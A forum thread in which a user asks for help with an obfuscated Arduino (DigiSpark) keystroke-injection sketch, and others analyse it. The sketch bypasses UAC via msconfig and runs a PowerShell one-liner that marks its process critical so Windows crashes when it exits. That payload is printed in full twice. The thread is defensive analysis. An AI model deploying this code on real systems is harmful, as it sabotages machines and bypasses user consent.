#Malicious scripts

I found a malicious script that is obfuscated. it is using my system resources and I meed help figuring out how to remove it. I think a good start if where the dll is that ti created because It appears to be doing that

#include "DigiKeyboard.h"
#define KEY_DOWN 0x51
void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}
void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("msconfig -5"); //starting msconfig
  DigiKeyboard.delay(1000);
 for(int bii =0; bii < 14; bii++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    } 
  DigiKeyboard.sendKeyStroke(KEY_L, MOD_ALT_LEFT); //bypassing UAC
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell"); //starting powershell
  DigiKeyboard.delay(1000);
  DigiKeyboard.println(F("$F=NEW-OBJECT SYSTEM.REFLECTION.ASSEMBLYNAME('BS');$B=[APPDOMAIN]::CURRENTDOMAIN.DEFINEDYNAMICASSEMBLY($F,[REFLECTION.EMIT.ASSEMBLYBUILDERACCESS]::RUN);$C=$B.DEFINEDYNAMICMODULE('BS', $FALSE);$E=$C.DEFINETYPE('BS.WIN32.NTDLL', 'PUBLIC, CLASS');$D=$E.DEFINEPINVOKEMETHOD('NtSetInformationProcess', 'NTDLL.DLL',([REFLECTION.METHODATTRIBUTES]'PUBLIC, STATIC'),[REFLECTION.CALLINGCONVENTIONS]::STANDARD,[INT32],[TYPE[]]@([INTPTR],[UINT32],[INTPTR].MAKEBYREFTYPE(),[UINT32]),[RUNTIME.INTEROPSERVICES.CALLINGCONVENTION]::WINAPI,[RUNTIME.INTEROPSERVICES.CHARSET]::AUTO);$J=$E.CREATETYPE();$H=[DIAGNOSTICS.PROCESS]::GETCURRENTPROCESS().HANDLE;$I=[SYSTEM.RUNTIME.INTEROPSERVICES.MARSHAL]::ALLOCHGLOBAL(4);$A=29;$G=4;$NULL=$J::NtSetInformationProcess($H, $A,[REF]$I, $G);")); //adding mayhem
  DigiKeyboard.println("exit"); //killing the critical process and BSOD
}```

The only way to be 100% sure is to reinstall windows.

For anyone else viewing this, this is just the PS bit

$F = New-Object SYSTEM.REFLECTION.ASSEMBLYNAME('BS')
$B = [APPDOMAIN]::CURRENTDOMAIN.DEFINEDYNAMICASSEMBLY($F, [REFLECTION.EMIT.ASSEMBLYBUILDERACCESS]::RUN)
$C = $B.DEFINEDYNAMICMODULE('BS', $FALSE)
$E = $C.DEFINETYPE('BS.WIN32.NTDLL', 'PUBLIC, CLASS')
$D = $E.DEFINEPINVOKEMETHOD('NtSetInformationProcess', 'NTDLL.DLL', ([REFLECTION.METHODATTRIBUTES]'PUBLIC, STATIC'), [REFLECTION.CALLINGCONVENTIONS]::STANDARD, [INT32], [TYPE[]]@([INTPTR], [UINT32], [INTPTR].MAKEBYREFTYPE(), [UINT32]), [RUNTIME.INTEROPSERVICES.CALLINGCONVENTION]::WINAPI, [RUNTIME.INTEROPSERVICES.CHARSET]::AUTO)
$J = $E.CREATETYPE()
$H = [DIAGNOSTICS.PROCESS]::GETCURRENTPROCESS().HANDLE
$I = [SYSTEM.RUNTIME.INTEROPSERVICES.MARSHAL]::ALLOCHGLOBAL(4)
$A = 29
$G = 4
$NULL = $J::NtSetInformationProcess($H, $A, [REF]$I, $G)

Looks like anti-RE/diagnostics deterrence, or just intentional sabotage - the msconfig bit is just UI automation to launch cmd.exe without a UAC prompt, from which it launches powershell, and the the powershell script basically injects its hosting process with a flag that (as the original source code comment suggests) will cause a system bugcheck when terminated. Could be a decoy or a "dangling sentinel" for something else launched by the same process - if an EDR or other management agent kills the parent process tree the system BSOD's immediately

Do you remember where you got this from? 😅 Legit asking for research purposes (I'm in the DFIR domain) and the script doing something that can cause the OS to BSOD/Crash is VERY interesting behavior that I'd wanna block in my environment lol

Not 100% but I think it was from installing and testing code on github. At the time I was programming a esp32 in Arduino IDE and was trying to make a signal generator. Didn’t work so i tried others code

it was trying to spawn blue screen of death?

Yep it was spawning a new powershell process that marked itself as critical then exiting. Once a critical process ends Windows will BSOD

Ah no worries! I'm working on pushing my career towards the RE domain and so it was very interesting sounding 😅 probably for the best I don't add more stuff to my backlog anyway 😂